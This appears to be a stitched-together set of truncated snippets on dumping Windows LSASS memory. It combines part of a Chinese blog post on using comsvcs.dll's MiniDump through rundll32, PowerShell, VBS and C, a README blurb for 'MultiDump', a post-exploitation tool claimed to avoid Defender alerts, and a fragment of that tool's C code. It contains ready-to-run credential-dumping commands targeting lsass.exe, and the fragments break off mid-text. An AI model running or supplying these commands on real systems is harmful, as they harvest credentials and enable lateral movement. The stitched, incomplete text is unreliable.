0x03 使用comsvcs.dll实现dump指定进程内存文件的方法 odzhan在文中给出了三种方法。 1.通过rundll32 示例参数如下: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\test\lsass.dmp full 示例中lsass.exe的pid为808。 注:此处需要注意权限的问题,在dump指定进程内存文件时,需要开启SeDebugPrivilege...
MultiDump is apost-exploitationtool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python. Blog post: https://xre0us.io/posts/multidump MultiDump supports LSASS dump viaProcDump.exeorcomsvc.dll, it offers two mode...
LSASS Using ProcDump...\n"); WriteToFile(ProcDump, sizeof(ProcDump), args.procDumpPath, args.verboseMode); dwArgsLen = wcslen(wszProcDumpPath) * 2; } else { printf("[i] Dumping LSASS Using comsvcs.dll...\n"); dwArgsLen = 64; // hardcoded since the path is the same } Lsass...
powershell -c "rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full" 2.通过vbs实现 原文提供了完整的实现代码。 执行的参数如下: cscript 1.vbs lsass.exe vbs脚本首先开启SeDebugPrivilege权限,接着执行rundll32的命令,测试成功。 3.通过c实现 代码先开启SeDebugPrivilege...